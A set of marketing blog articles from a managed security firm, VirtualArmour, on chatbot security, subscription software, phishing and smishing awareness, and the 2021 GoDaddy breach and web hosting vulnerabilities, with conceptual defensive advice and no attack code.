NEED SUPPORT? CALL (855) 422-8283

Virtual Armour
Hack the Chat

Hack the Chat

Last updated August 19, 2022

Summary:

  • By the end of 2022, 70% of white collar workers will interact with chatbots on a daily basis—but chatbots can pose a cybersecurity risk if they are not properly protected.
  • Chatbots can improve customer experience by identifying leads in real time, improving user engagement, and collecting user data for A/B testing.
  • However, cybercriminals can exploit chatbots to impersonate people, deliver malware, steal or alter data, and launch phishing attacks.
  • Common chatbot vulnerabilities include unencrypted communications, allowing back-door access, missing protocols, and hosting platform issues.
  • Types of chatbot attacks include network hacks, social engineering attacks, and real-time chatbot takeovers.
  • Software updates, working with experienced chatbot developers, restricting chatbot access to registered users, and implementing multi-factor identification can all make your chatbot usage more secure.
  • Web Application Firewalls, end-to-end encryption on messages, authentication timeouts, self-destructing messages, and other strategies can also improve chatbot security.

Chatbots, those little customer service pop-up menus on websites that ask how they can help you, are becoming ubiquitous, changing how users interact with both websites and the businesses behind them. 

Machine-learning programs such as Siri, Alexa, Google Assistant, and website chatbots have become one of the fastest online sales generating tools businesses have at their disposal. A 2016 study by Oracle found that 80% of businesses planned to onboard customer interaction AIs to their website, and a 2019 article by Gartner predicts that by the end of 2022, a full 70% of white-collar workers will interact with conversational platforms (chatbots) daily. 

However, while website chatbots are incredibly useful, they can also pose a security risk if appropriate cybersecurity measures aren’t taken. In this article, we will discuss how chatbots can leave your organization vulnerable to new hacking tactics and explore steps your organization should be taking to secure your website chatbot.

If your organization has recently experienced, or is currently experiencing, a cybersecurity incident such as a chatbot hack, please contact our team right away and consider reviewing our educational article: Hacked? Here’s What to Know (and What to Do Next).

See also:

woman locked out of her computer

How Chatbots Can Improve the Customer Experience

Chatbots offer many advantages to both customers and businesses. Chatbots allow customers to independently move down the sales funnel, offer users more information about your company’s products and services, and provide your company with valuable data on customer interests. 

By taking over these functions from live staff members, businesses can free up valuable team members for other business-building activities or reallocate the funds that would have been spent on sales staff wages for other uses. Chatbots are also not constrained by reasonable shift lengths or labor laws and never need sick days or vacations.  

When implemented correctly, chatbots can:

Identify Leads in Real Time

Chatbots allow you to engage with customers while they are using your app or website, catching them when they are most engaged. It also allows customers to get answers to common questions right away (an IBM study found chatbots can handle 80% of routine tasks and customer questions) and make the entire website experience more engaging. Chatbots can also gently guide customers towards the next sales funnel stage.

Improve User Engagement

Unlike human beings, chatbots can easily engage with multiple customers at once without losing focus. They can also regularly send customers product updates and offers, offer instant responses to customer inquiries, and are available 24/7/365. They can also be programmed using multiple languages to better engage with all of your target demographics.

Collect Valuable User Data & Engage in A/B Testing

Modern marketing runs on user data, and chatbots are well-positioned to collect it. Chatbots can seamlessly gather customer data in real-time (and ask follow-up questions to gain more information), analyze the data, and provide you with the information you need to continue to improve your products or services and reach new consumers.

Chatbots also allow you to contact A/B tests simultaneously (and much faster than manual A/B testing) and swiftly provide your team with test results and the chatbot’s analysis.

man and woman looing at solutions

Chatbot Risks

Chatbots are a valuable tool, but like any digital tool, they are also vulnerable to cybercriminals. Without proper security precautions in place, chatbots can be used to:

  • Impersonate individuals 
  • Deliver ransomware and other forms of malware
  • Engage in data-theft
  • Alter data
  • Engage in phishing or whaling attacks

Many companies offer chatbot programs, but not every chatbot is as secure as it could be. Common chatbot vulnerabilities include:

Hack the Chat: How Bad Actors Are Taking Advantage of Chatbots

Before you implement a chatbot, you should ensure it meets your company’s existing security standards and make sure your team is aware of the types of attacks cybercriminals commonly use against chatbots.

Types of Chatbot Attacks

Network Hacks

Much like a burglar can creep through an unlocked window, cybercriminals can use unsecured or insufficiently secured chatbots to gain access to your network. As such, cybercriminals will frequently evaluate chatbots for potential vulnerabilities that can be exploited to gain wider network access.

Social Engineering Attacks Using Chatbots

Cybercriminals can also turn chatbots into tools of their own. If a cybercriminal already has an existing customer’s username, they may be able to leverage the chatbot in a social engineering scheme to reset the account password (granting the cybercriminal access), make unauthorized purchases, or change the payment information on the user’s account.

Real-time Chatbot Takeovers

In this scenario, a cybercriminal would have to have already infiltrated your website and be in a position to intercept customer communication via the chatbot. Because chatbots are an extension of your company, customers may let their guard down as they would around one of your human employees. 

Cybercriminals can take advantage of that presumed trust to ask users for sensitive personal information, such as social insurance numbers or credit card numbers, or direct users to send funds outside of usual payment avenues. 

Safeguard Your Website With These Chatbot Best Practices

Keep Your Software Up to Date

One of the easiest things any company can do to quickly improve their security is keep their software up to date. When software developers discover vulnerabilities, bugs, or other issues with their programs, they release patches to fix them. By downloading all security patches as soon as they become available, you can proactively safeguard your network and the digital assets stored on it. 

Unpatched software is also particularly vulnerable. Companies typically announce when a patch is released, alerting both legitimate users and cybercriminals. This can inadvertently increase a company’s chances of being targeted by cybercriminals as these criminals redirect their attention to companies that they know are using the recently patched software in the hopes of exploiting the vulnerability before all network users have downloaded the patch.

Hire an Experienced Chatbot Developer

While you may be excited to get your chatbot up and running, it pays to shop around and find a developer with chatbot security and design experience. Before you begin production, make sure to ask your developer how they plan to secure your chatbot and make sure their plan meets your high security standards.

Restrict Chatbot Use to Registered Users Only

While restricting chatbot use privileges to registered users may hinder your efforts somewhat from a sales perspective, it can pay attractive security dividends. Cybercriminals are always on the lookout for easy targets, and adding this extra layer of security both eliminates (or at least reduces) anonymity and makes your website chatbot a less appealing target. Requiring users to register with your website before using the chatbot is an easy to implement and cost-effective security measure.

Implement Two-Factor Authentication

In addition to requiring usernames and passwords, you may want to consider implementing two-factor authentication. This adds an extra layer of security during the login process, requiring users to enter two different pieces of information to verify their identity. 

This often takes the form of a strong password paired with a text message prompt or a hardware element. As such, for a cybercriminal to successfully log in to a legitimate user’s account, they would need the user’s username and password as well as access to the one-time code sent to the user’s phone or the physical hardware element attached to that user’s account.

Install a Web Application Firewall (WAF)

Web application firewalls are designed to safeguard your website from malicious traffic and harmful requests. This is critical since it could help prevent cybercriminals or their botnet from using your chatbot to inject malicious code into your network (such as during a ransomware or other malware attack). 

Implement End-to-End Encryption on Chatbot Messages

End-to-end encryption is a critical security measure and should be used both for chatbot conversations and in any context where a message is sent from one person or entity to another (including chatbot sessions, email, and internal employee chat programs). 

Implement Authentication Timeouts

This simple yet effective step, designed to limit how long a user remains logged in before they are automatically logged out, is incredibly effective. If a user remains logged in but inactive for too long, a prompt window will appear asking them to re-enter their login credentials or confirm that they are still active. The prompt window may also be designed to inform the user that they have been logged out. This simple design change can prevent crimes of opportunity, where a cybercriminal is able to take advantage of a still-logged-in user to wreak havoc. 

Self-Destructing Messages

While this may sound like something out of a spy movie, self-destructing messages are a great way to make your chatbot more secure. This security measure is just what it sounds like: either after a chat session has concluded or a select amount of time has elapsed, all messages sent to and any sensitive information shared with the chatbot is automatically erased. While some users may find this inconvenient, the inconvenience is outweighed by this approach’s security benefits.  

Put Your Chatbot to the Test With Pen Testing

As the old saying goes, the best defense is a good offense. Pen (penetration) testing involves hiring an ethical hacker (sometimes called a “white hat”) to stress test your defenses and try to break into your network. The pen tester documents any security gaps or deficiencies they find and then shares their findings and their recommendations with you and your security team once the test is complete. 

By proactively seeking out vulnerabilities, you can ensure these shortcomings are addressed before any actual cybercriminals can exploit them. 

Consider Offering a Bug Bounty

While this option can be risky because it involves actively inviting technically-savvy users to look for security issues, offering a bug bounty can also pay off. Bug bounties are just what they sound like: if a user finds a security bug and tells your team about it, you offer them a reward as a thank you. 

Chatbots can be a great way to reach customers, improve the customer experience, and help move potential customers down the sales funnel. However, like all digital tools, chatbots can pose a risk to your company’s overall security if appropriate measures aren’t taken. 

Worried Your Chatbot is A Security Liability? VirtualArmour is Here to Help

Not everyone is a cybersecurity expert, and that’s okay. The VirtualArmour team is staffed by security experts from a wide selection of cybersecurity and IT disciplines. Whether you’re starting from scratch or improving an existing website or chatbot, our team is here to help. We offer a variety of services, including vulnerability scanning and managed firewall services.

For more information, or to start improving your company’s security posture, please contact our team

Subscription Model Software: Pros and Cons

Subscription Model Software: Pros and Cons

Last updated August 19, 2022

Summary:

  • Subscription-based cloud and managed IT and security services help SMBs eliminate the up-front costs of setting up their own in-house systems.
  • Managing IT and cybersecurity systems is time-consuming, and can drain critical resources from an organization during incidents, disrupting profits and business operations.
  • Subscribing to a SaaS company provides instant updates, bug fixes, and new features while reducing initial costs.
  • Subscription-services often take a modular or a la carte approach, allowing them to be personalized to each client and scale with the organizations that use them.
  • The set fees associated with subscription software also make them easier to budget for and incentivize providers to keep adding value, resulting in improved services over time.

The subscription model has become increasingly popular over the last few years as apps and other services move away from one-time purchase models. Once just the domain of magazines and cheese of the month clubs, service providers in the IT and cybersecurity spaces have begun to adopt this model with increased frequency as software transitions away from being desktop-based and migrates to the cloud. In this article, we will discuss the benefits of subscription-based IT and cybersecurity platforms for users.

Cloud and managed IT and cybersecurity services, in particular, are an excellent fit for the subscription-based model. Under this model, users don’t purchase software (or software licenses) outright and instead pay a monthly fee per user. 

Complex IT systems are incredibly expensive to set up, maintain, and operate and come with steep upfront costs, putting them out of reach for most small and medium-sized businesses. Both the OPEX and CAPEX of maintaining the hardware and software needed to support complex IT and cybersecurity systems can be unpredictable, making even those SMBs with the budget to attempt a DIY approach hesitant to take this road.

See also:

comprimised phone

Subscription Models Allow SMBs to Offload the Hassle & Expense of Maintaining Complex Infrastructure

The hardware and software needed to manage IT and cybersecurity systems is complex enough that entire teams of dedicated professionals are required to manage and support them to ensure everything is running smoothly. Should something go wrong, the entire system may grind to a halt until the experts determine what the core problem is. This is completely unacceptable for a SMB, who would need to pull critical team members away from other valuable, revenue-generating tasks to attend to the problem and pausing regular business operations until the situation is resolved. 

By offloading this stress and people-power onto a SaaS (software as a service) company, SMBs can focus on running and growing their business, knowing that if an issue should occur an entire team of dedicated professionals will address it, often before the end user even realizes something was amiss. SaaS companies have one job: to maintain the hardware and software their product needs to run smoothly so that their customers can focus on their business and leave the IT and cybersecurity up to the professionals. 

The User Benefits of Subscription-Based Software Platforms

man and woman looing at solutions

Your Software is Always Up to Date

There is nothing worse than sitting down at your desk, ready to start the workday, and turning on your computer only to learn that your software requires updating. While many updates only require a few minutes, others can take much longer, leaving workers twiddling their thumbs while the clock ticks. And since desktop-based software requires users to manually trigger updates, many busy SMB IT managers are forced to continually remind their equally busy co-workers to update their software and download new security patches to ensure everyone is using the same version and that the network remains secure.

The subscription model addresses both of these problems by ensuring all new software updates are applied automatically, and if downtime is required, these updates can be timed so that they happen when the office is closed. This both ensures everyone is always using the same version, security patches are up to date, and eliminates time wasted while employees wait for software updates to finish. 

Get the Latest Features & Bug Fixes Instantly

Security is everyone’s responsibility, from the summer intern to the CEO. Because subscription-model software is kept up to date automatically, businesses can rest easier knowing that every device on the network has its security patches up to date. This simple action, which the SaaS provider handles for you, has outsized results when it comes to cybersecurity. 

Cybercriminals often target recently patched software, knowing that not all users will be as diligent as your business about installing security patches right away. By handing this responsibility back to the SaaS provider, your busy IT team can get this off their plate and focus on activities that build your business instead of just maintaining its infrastructure. 

Everyone is Always on the Same Page

Automatic updates also ensure that every user on the network is using the same version of every program, eliminating versioning issues across your organization. By ensuring everyone is always on the same page, you can focus on building and growing your business instead of worrying about whether your co-workers will be able to access the report you wrote or if they are seeing something different than you are when they open a file.

Dramatically Reduce Up-Front Costs

Setting up and maintaining your own IT and cybersecurity infrastructure is incredibly expensive and labor-intensive; that is why entire companies are built around providing these services for other businesses. 

The subscription model eliminates the need to purchase a bunch of expensive software licenses upfront (a not insignificant expense, even if your business only has a handful of employees). Offloading the stress and hassle of maintaining a server room or other IT or cybersecurity infrastructure also dramatically reduces CAPEX costs, and not needing to hire an entire team to manage and maintain this infrastructure drastically reduces personnel costs at the same time. 

Hiring even a single IT or cybersecurity professional to wait around in case something goes wrong is an unnecessary expense, using up funds that could be better deployed elsewhere. With the subscription model, if something goes wrong, you can breathe easy knowing an entire team of professionals, whose entire job is to make sure things go smoothly, is already on it. These service providers also invest in layers of hardware redundancy, so if something does go wrong, user traffic can be smoothly rerouted (eliminating or at least dramatically reducing downtime) while the experts get to the root of the problem.  

Shop Around Before You Commit

Software licenses can be very expensive, so you want to make sure you have chosen the right tool for the job before you hand over your business’ hard-earned funds. Because the subscription model dramatically reduces these upfront costs, it is much easier to shop around for a SaaS provider that offers a product that meets your team’s needs and plays nicely with your existing infrastructure. 

Scale Your Subscription to Meet Your Current Organizational Needs

When you purchase a software license up-front, you are often locked into a contract that lasts at least a year and may not be easy to cancel. By opting for a provider that operates using a subscription model, you are never paying for more licenses than you are actually using at any point in time, and scaling up or down to meet your organization’s shifting needs is as easy and painless as a few clicks of a button. 

Also, because SaaS subscription models are specifically designed to scale smoothly, you can avoid the headache and lost productivity associated with finding a new vendor should you outgrow your current software solution. 

Multi-Tier Approach & Personalized Options to Suit Your Needs

Every business is unique and has unique IT and cybersecurity needs and concerns that need to be addressed. Many SaaS providers offer multiple tiers for users to choose from so client companies can select the best tier to meet their needs. For example, VirtualArmour offers two tiers: essential services and premium services

Many of these services can also be personalized using an à la carte approach that allows users to pick and choose between multiple services so they can curate a package that suits their needs. This not only gives users more granularity over their solution but eliminates the need to pay for services a particular company doesn’t actually need or want. 

Subscription Model Software Makes Budgeting a Breeze

Moving CAPEX into OPEX by opting for a subscription model approach makes it much easier to budget for software expenses. When a software license is purchased outright, most companies offer users a quote based on the customer’s current number of users and (if relevant) the service tier they would require. However, a once cost-effective solution can transform into a huge financial drain if a company scales more rapidly than anticipated (thereby jumping into a higher, more expensive, user number tier) or requires a more personalized approach, achieved via pricy add-on services, than their current providers’ one-size-fits-all approach can offer (the additional cost of which the customer may not have been made aware of before committing to a one year or multi-year contract). 

Software licenses are also typically purchased on contract, meaning you pay for a full year upfront, whether you will use the full year or not. Suppose a pivot or other business change leaves you with a bunch of unnecessary software licenses. In that case, the traditional licensing approach can leave you eating the cost for the whole year, effectively paying for software you aren’t even using. The subscription model offers much more transparent pricing: You pay a set fee per user, which is communicated upfront before signing on the dotted line. If you need to add or subtract users, your price increases or decreases by the previously communicated per-user amount accordingly, and the change is reflected in your next monthly bill. 

Not having to purchase, upgrade, and maintain your own supporting hardware makes it significantly easier to allocate your infrastructure budget since you don’t need to worry about suddenly replacing damaged hardware or pouring your own money into necessary upgrades to ensure your workers can continue to do their jobs effectively. 

Build Relationships

Unlike one-time purchases, the subscription model approach also helps build relationships between providers and users. In addition to providing you with a service, subscription model providers are now invested in helping ensure you and your team are comfortable using their product and pleased with the functionality it offers since an unhappy subscription customer can quickly and easily switch to a competitor. 

Providers are also more likely to proactively solicit and consider user feedback to keep users happy. There is also a strong incentive for the provider to stay up to date on the latest industry developments and continually work to improve their product by adding more features and addressing user concerns promptly and effectively, all while sharing expert knowledge with their customers so users can get the most out of the provider’s product. 

Unlike the one-time purchase model, the subscription model is a natural relationship-building tool, encouraging ongoing communication and feedback between the user and the provider in a way that benefits both parties: providers typically enjoy higher levels of customer loyalty, while users are often given more say in future features and updates.

Reliability You Can Depend On

You have a job to do: yours, not your IT or cybersecurity teams’. The SaaS business model is predicated on making sure all users have the tools they need to do their jobs effectively at all times. To help ensure smooth, uninterrupted service, many SaaS providers invest in multiple layers of hardware redundancy and multiple secure backups (a high but necessary expense, well out of the reach of the average SMB) and employ an entire team of experts whose only goal is to keep things running smoothly. 

Redundant systems also help ensure that impacted user traffic is swiftly and smoothly rerouted until the problem is solved, a process so seamless that many end users might not even realize there was a hiccup in the first place. This allows customers to focus on their business instead of managing their own IT and cybersecurity infrastructure, hiring internal IT or cybersecurity experts using funds better spent elsewhere, or spending money on now-redundant licenses for software they may not even be using anymore. 

Need an Expert? VirtualArmour is Here to Help

Not everyone is an IT or cybersecurity expert, and that’s okay. A good SaaS provider is more than just a service provider; they are a valued partner, working with you and your team to ensure you have the tools you need to do what you do best and leave the hassle and expense of managing your IT or cybersecurity infrastructure up to a trusted team of experts. 

VirtualArmour offers a wide variety of IT and cybersecurity services, including :

We also offer three service tiers to best suit your needs: Essential services, premium services, and one-time consulting services. For more information about how we can help support your IT and cybersecurity needs, or to request your free, no-obligation quote, please contact us today

Phishing Attacks are Evolving: What You Need to Know to Keep Your Company Safe

Phishing Attacks are Evolving: What You Need to Know to Keep Your Company Safe

Last updated August 19, 2022

Summary:

  • Phishing is a form of social engineering where the attacker impersonates a trusted party for the purpose of gaining access to sensitive information like login credentials, personal information, or payment card data.
  • A company with 5000 employees will receive an average of 14,400 phishing emails each year—not including the ones caught by spam filters.
  • Phishing tactics are becoming more advanced over time, and phishing attacks are most common during the holiday season, when consumers often face increased stress levels.
  • SMS phishing scams are on the rise, so it’s vital to use caution if you recieve texts from a sender you don’t recognize.
  • Cybersecurity training for employees and visibility scanning are two essential ways to prevent and combat phishing scams. VirtualArmor can provide both of these services.

Phishing scams tend to peak during and around the winter holiday season, catching individuals and businesses alike unprepared. To help ensure you and your team have the information you need to identify and avoid these scams, we sat down with one of our VirtualArmour cybersecurity engineers to learn more about this common cybersecurity threat.

If you are currently experiencing, or have recently experienced, a cybersecurity incident, please contact our team for immediate assistance and consider reviewing our educational article: Hacked? Here’s What to Know (and What to Do Next). Our team can help you fend off the attack, identify the root cause of the issue, and create an actionable, comprehensive plan to help mitigate or even avoid further damage.

photo of a credit card with a fishing hooks in it, symbolizing how people use phising to steal credit card information

What is Phishing?

Phishing is a type of social engineering typically used to steal user data such as login credentials, personally identifiable information (PII), or payment card information. This type of cyber attack involves a threat actor masquerading as a trusted party (such as your bank) in order to trick you into opening an email, text message, instant message, or other electronic message and inadvertently handing over sensitive information such as personally identifiable information (such as your full name, birth date, or social insurance number) or payment information (such as your credit card number). 

Phishing attacks pose a serious threat at both the personal and corporate levels. Though most email spam filters are able to stop the most egregious attempts at phishing, even the best filters and firewalls aren’t able to catch everything. Phishing scams continue to evolve, and the sheer number of phishing emails alone is staggering. Research into the volume of email, spam, and malicious attachments and URLs directed at companies found that a company with 5000 employees will still have an average of 14,400 phishing emails arrive in employee inboxes each year, and those are just the emails that were savvy enough to get past the spam filter. 

With so many emails alone slipping past our defenses, employee training on how to spot and report potential phishing scams is key. However, many threat actors are changing tactics and moving away from email and towards other forms of electronic communication.

Phishing Tactics Have Evolved

When many of us think of phishing emails, we likely still picture some scammer pretending to be a fabulously wealthy prince from some faraway land promising riches in return to helping them covertly move money out of their home country (a common ruse referred to as an advance-fee scam).

The advanced-fee scam is a classic ruse that involves the threat actor asking you to help them by either transferring money to the target (purportedly for “safekeeping” or to evade authorities) while also asking you to pay a fee to help move the money with the promise that they will both send you money to cover the advanced payment and reward you handsomely for your cooperation.

Though this elaborate ruse has become cliche even outside of cybersecurity circles, unfortunately, many individuals and companies still fall for this and similar advance fee scams. A recent CNBC article found that these advanced fee scams still net cybercriminals well over $700,000 USD per year.

Why Do Phishing Scams Peak Around the Holiday Season?

Phishing campaigns typically soar in popularity over the holiday season in an attempt to prey on festive (and often frazzled) shoppers using increasingly sophisticated phishing scams. 

However, it isn’t just holiday shoppers that fall for these campaigns; many businesses and other organizations of all sizes continue to fall victim to these types of attacks.

One common example of a popular business-targeted phishing scam involves sending the target an email with a domain that appears to link to the company website and contain innocuous information (such as a festive meal menu with a .doc file extension, paired with an email asking the employee to please indicate their meal preference and dietary restrictions for the company party). However, though the email appears legitimate at first glance, a red flag such as a misspelled domain (for example, virtaularmour.com’ rather than ‘virtualarmor.com’, note the transposed ‘u’ and ‘a’) indicates that this email is likely malicious and should be both flagged as spam and reported to your company’s IT or cybersecurity team.

“Smishing” (SMS Phishing) Scams Are On the Rise

Though these types of scams tend to peak around the holiday season, they are still common year-round. The fake delivery text is a new form of this age-old scam that has been making the rounds and is rapidly becoming one of the most common formats for smishing scams. 

One theory behind the rise in this particular style of phishing scam is the increase in lockdowns worldwide, prompting a rise in online shopping, particularly during the holiday period. Before clicking on any links in a suspicious text message, it is critical to verify whether the text message is legitimate (such as by calling your local post office or delivery depot to verify if there really is a parcel waiting for you).

How to Recognize (& Avoid Falling Prey To) a Smishing Attack

If you receive a suspicious text that may be part of a smishing scam, there are a few steps you can take to help avoid falling prey: 

  1. Never respond to a potentially suspicious text message. If a response appears to be necessary, respond via a verified official channel (such as calling your delivery company or local post office directly).
  2. Never click on any links or phone numbers sent from a user you don’t recognize.
  3. Never share any payment information or personally identifiable information, such as your social security number, birth date, or full name. 
  4. Report any messages that appear suspicious to the relevant authority.
    1. In the United Kingdom, reports can be filed with the National Cyber Security Centre here.
    2. In the United States, reports can be filed with the FCC here and FTC here.

A common example of a scam asking for payment information is a scammer posing as your bank and asking you to update your account information (usually under threat of being locked out of your accounts or some other undesirable outcome). In this case, you should contact your bank immediately via an official channel (most banks print a toll-free number on the back of their credit or debit cards or somewhere on your bank statement) and independently verify that your information requires updating. This not only helps you avoid falling victim to a potential phishing scam but also alerts your bank so they can warn other customers about the scam so they can avoid falling prey as well.

laptop screen with phishing tactics being used on an unsuspecting user

Awareness is Critical

Education and awareness are a cornerstone of any solid cybersecurity strategy. By educating yourself and others about common scams and red flags to look for, you can help reduce the chance someone falls victim. Individual scams are often short-lived, so you need to act quickly; Verizon reports that 50% of scam targets open emails and click on phishing links within an hour of receiving a suspicious email.  

Investing in employee cybersecurity training is vital. When it comes to scams, your employees are one of your first lines of defense, which is why all employees, from the summer intern up to the CEO, should undergo regular cybersecurity training. To help set everyone up for success, you should also include cybersecurity training as part of your company’s onboarding process. 

Vulnerability Scanning Offers Total Visibility Into Your Infrastructure

You can’t defend yourself against cybersecurity threats if you don’t know they exist. Vulnerability scanning helps ensure that no threat makes its way past your defenses by providing detailed information on threat intelligence, device health, threat mapping, and support ticketing. Being able to view all traffic on your network at all times is critical for spotting suspicious activities, so you can respond swiftly and effectively to safeguard both your data and your organization should a threat actor sneak past your defenses. 

Social Engineering Takes Many Forms

Many of these attacks depend on social engineering. Social engineering involves manipulating potential victims into revealing personally identifiable information and can be used to access either personal or organizational accounts. Social engineering attacks typically rely on consistent communication between the attacker and the target and frequently take the form of text messages, instant messages, or emails. 

As COVID-19 continues to force workers to trade their desks at work for their kitchen tables, spare rooms, and home offices, attacks of this nature are becoming more frequent and more effective. This, combined with more mundane but still frustrating events such as a purportedly missed delivery (which you can conveniently reschedule by clicking on this completely legitimate link), has created an ideal environment for threats like phishing scams to flourish. 

Worried About Phishing Scams? VirtualArmour is Here to Help

Not everyone is a cybersecurity expert, and that’s okay. VirtualArmour is full of experts like the cybersecurity engineer who helped us write this educational article. Whether you need help drafting a cybersecurity strategy, are looking for someone to monitor your network 24/7/365 for suspicious activities, or are looking to bolster your internal IT or cybersecurity team, our team is here to help. For more information, or to start improving your organization’s cybersecurity posture, please contact our team today.

About the Author

Kurt Pritchard is a SOC Engineer at VirtualArmour, you can learn more about him on his LinkedIn.

GoDaddy: Have You Been Impacted and What to Do Next?

GoDaddy: Have You Been Impacted and What to Do Next?

Last updated August 19, 2022

Summary:

  • In 2021, GoDaddy’s Managed WordPress hosting environment was accessed by an unauthorized third party using a compromised password.
  • The hack accessed the personal data of an estimated 1.2 million Managed WordPress customers, exposing them to potential phishing attacks.
  • Other web hosting providers are also vulnerable to these attacks, which fall into three categories: general web hosting vulnerabilities, shared hosting vulnerabilities, and VSPs and cloud-hosting vulnerabilities.
  • Following website best practices, creating an incident response plan, and investing in cybersecurity training for employees can minimize your organization’s risk and help you avoid similar threats.

On November 22, 2021, the hosting platform GoDaddy revealed that an unauthorized third party had accessed their Managed WordPress hosting environment. Unfortunately, GoDaddy isn’t unique; many hosting providers remain vulnerable to similar attacks. In this article, we will discuss what is known about the incident so far.

What We Know About the Attack So Far

GoDaddy responded swiftly and effectively, working with law enforcement and an IT forensics firm to thoroughly investigate the incident and take appropriate steps to safeguard users. 

What Happened?

On November 17, GoDaddy identified suspicious activity inside their Managed WordPress hosting environment, triggering an internal investigation with the help of an IT forensics firm. It was later determined that an unauthorized third party had used a compromised password to access the provisioning system for their Managed WordPress legacy codebase.

In response to this troubling discovery, GoDaddy immediately blocked the unauthorized third party from their system and began alerting affected users. 

So far, the investigation reveals that the unauthorized third party had been using these compromised credentials to gain access to the system beginning on September 6, with a goal of obtaining private customer information, including:

  • The email addresses and customer numbers of as many as 1.2 million active and inactive Managed WordPress customers were accessed, which the company said may increase the chances of phishing attacks
  • The original WordPress Admin passwords set on these accounts, which were also exposed. As a preemptive measure, any account still using its original WordPress Admin password was subject to a password reset.
  • SFTP and database usernames and passwords of active users. Once this was discovered, GoDaddy immediately reset the passwords on these accounts.
  • The SSL private keys of a subset of active customers. To address this, GoDaddy immediately began issuing and installing new certificates on affected accounts.

Six Additional Web Hosting Providers Impacted

GoDaddy has also revealed that six other web hosts have been impacted by this incident. All six are European resellers of GoDaddy’s Managed WordPress hosting services and include:

What is GoDaddy Doing to Address the Situation?

The investigation is ongoing, and in addition to the actions outlined above, all impacted customers will be contacted directly by the GoDaddy team and provided with specific details. Customers can also contact the GoDaddy team via their online help center, which also includes country-specific phone numbers. 

security camera monitoring a lobby, people need this kind of security for the web

It Isn’t Just GoDaddy; All Hosting Providers Are Vulnerable

While GoDaddy is currently in the spotlight, incidents like this are hardly unique to one hosting provider. Cybercriminals frequently target websites, and many of those attacks are targeted at web hosting accounts.

Common web host vulnerabilities fall into three main categories: general web hosting vulnerabilities, shared hosting vulnerabilities, VPS and cloud hosting vulnerabilities:

General Web Hosting Vulnerabilities

Botnet-Building Attempts

This is when attackers attempt to use publicly available exploits to hijack your web servers and use your infrastructure as part of a botnet (connected computers instructed by a third party to perform repetitive tasks) to attack other organizations. 

Less secure web hosting providers are particularly vulnerable. However, once these vulnerabilities are discovered, they are typically patched fairly quickly.

DDoS Attacks

DDoS (distributed denial of service) attacks flood web servers or other online services with traffic in an attempt to crash the system. This can be done either by a large group of cybercriminals or a single criminal commanding a botnet. The goal of DDoS attacks is to overload the server and prevent legitimate users from accessing a company’s services or products.

Web Server Misconfigurations

Many basic website owners, particularly those using low-cost shared hosting, often have no idea whether or not their servers have been correctly configured. This is problematic because misconfigured servers are often left vulnerable and may be running unpatched or outdated applications. 

Incorrectly configured servers may also be unable to accurately verify access rights, and hiding restricted functions or links to the URL alone is unlikely to deter attackers. This is because attackers are likely technologically savvy enough to guess the probable parameters and typical locations of this sensitive information and then simply use brute-force attacks to gain access. 

Shared Hosting Vulnerabilities

If having your own server is like owning a single-family home, shared hosting environments act more like apartment buildings, where each account has its own unit within the larger structure. Unfortunately, that means a single attack can impact all of the accounts on a single server. 

Non-Siloed Environments

Organizations that op for shared hosting accounts are particularly vulnerable because these types of accounts exist like large pools of data. Though each account is allocated its own select resources, they all exist within a single environment, so all data, content, and other files occupy the same space and are only divided based on the file structure.

Since all of this data is stored in one location, shared hosting sites are intrinsically linked. This means that if an attacker is able to access the main directory, all sites within the pool may be at risk, and a single compromised account could provide the attacker with a way into the supposedly closed system.

Software Vulnerabilities

All types of hosting accounts can contain software vulnerabilities, but shared servers are typically more at risk. This is because the large number of accounts per server means that each server is likely to host a variety of different applications, each of which will need to be updated regularly to take advantage of security patches and other updated security measures. A single unpatched or out-of-date application may leave the entire server vulnerable.

Malware (Including Ransomware)

Malware, and particularly ransomware, is a growing problem. Though a ransomware attack may target any hosting provider, shared hosting servers are particularly ill-adapted to contain such an attack. Because multiple accounts are hosted on a single server, it is easy for a ransomware attack to spread from one company’s account and infect the rest of the accounts on the same server.

Shared IP Addresses

Shared hosting accounts also share IP addresses, with multiple sites typically being identified by a single IP address, much like all units in a single apartment building share one street address. Unfortunately, this means that if one account is compromised and begins sending out spam or otherwise behaving badly and is blacklisted by a company or service, all other sites sharing that IP address will be blacklisted as well. 

This is problematic because getting an IP address removed from a blacklist is typically quite difficult, and organizations are unlikely to cooperate if one of the accounts attached to that IP address continues to behave badly or disregard the organization’s terms of service.

woman review her computer settings and ensuring her cyber security are correct.

VPS & Cloud Hosting Vulnerabilities

Though virtual private servers (VPS) or cloud hosting options are typically more secure than shared hosting options, they are still vulnerable. Attackers often target these types of hosting accounts because of the advanced interconnected nature of these servers, presenting a lucrative payday for hackers. As such, these types of attacks are also typically carried out by more experienced attackers using advanced methods. 

Cross-Site Security Forgery

Cross-site security forgery, also called cross-site request forgery (CSRF), is a flaw that generally affects websites built using unsecured or poorly secured infrastructure. For convenience, many users save their credentials on select platforms, which can be a risky decision if the corresponding website is not secure. 

During a CSRF attack, the end-user is forced to execute an unwanted action, such as automatically transferring funds, on a web application in which they are currently authenticated. Using social engineering (such as sending a compromised link via chat or email), an attacker may be able to trick users of a specific web application into doing what the attacker wants without the attacker having to bother trying to determine a username or password. 

This works because the attacker has already queued up the action they wish to perform (such as transferring funds) and because the credentials are saved when the unsuspecting user clicks the link, they are automatically logged in (because their credentials are saved), and the application will go ahead and complete the action before the user is even aware of what happened.

This can be particularly devastating on admin accounts and can compromise the entire web application. 

SQL Injections

SQL injections work by extracting data, such as customer information or financial data, from a system as the data is sent to and from your database server. If this route is not secure, attackers can insert SQL scripts into the infrastructure and scan all data queries before they even reach the server. 

This attack works like a postal delivery worker opening and reading all of your mail and copying down any private information they discover before delivering your letters and parcels. 

Exploiting XSS Flaws

Harmful XSS-based scripts are small programs that can be used to either access confidential information or redirect legitimate users to fraudulent websites. 

Though this attack is most commonly used by attackers looking to capture usernames and passwords or trick users into entering their credit card number or other sensitive information into a fraudulent website (such as one that is designed to look almost exactly like your bank’s website), this technique can also be used by organizations to carry out fraudulent business operations.

Insecure Cryptography

Cryptography algorithms typically rely on random number generators, but not all random number generators are made equal, and some random number generators may produce easily guessable numbers which attackers can use to their advantage.  

Virtual Machine Vulnerabilities

Multiple virtual machines can be run on top of hypervisors in physical servers. However, if there is a vulnerability in the hypervisor, attackers may be able to infiltrate the system remotely and gain access to all virtual machines hosted on a physical server. Though this type of attack is rare, it is still possible, and organizations that use virtual machines should take appropriate steps to safeguard their infrastructure. 

Supply Chain Weaknesses

